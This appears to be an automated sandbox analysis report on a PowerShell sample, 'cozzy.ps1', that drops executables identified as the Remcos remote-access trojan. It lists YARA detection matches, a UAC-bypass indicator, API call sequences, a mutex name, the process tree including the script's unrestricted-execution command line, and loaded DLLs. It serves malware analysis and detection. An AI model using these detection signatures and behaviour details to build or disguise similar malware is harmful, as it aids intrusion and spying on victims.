Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winPS1@7/9@3/3

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

4_2_00417AD9

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

4_2_0040C03C

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,

4_2_0041B9AB

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

4_2_0041AC43

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7J4RV4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvur0s1n.fqt.ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Rmc-7J4RV4	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: -Sys	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Rmc-7J4RV4-Sys	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Software\	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Rmc-7J4RV4-Sys	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: $cG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Exe	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Exe	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Rmc-7J4RV4	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Inj	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Inj	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: lcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: @)i	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: @)i	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: @)i	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: @)i	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: exepath	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: exepath	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: @)i	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: licence	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: 0aG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: l]G	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: System	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: Administrator	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: User	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: del	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: del	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: del	4_2_0040E560
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Command line argument: TcG	4_2_0040E560

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: cozzy.ps1	Virustotal: Detection: 27%
Source: cozzy.ps1	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\cozzy.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
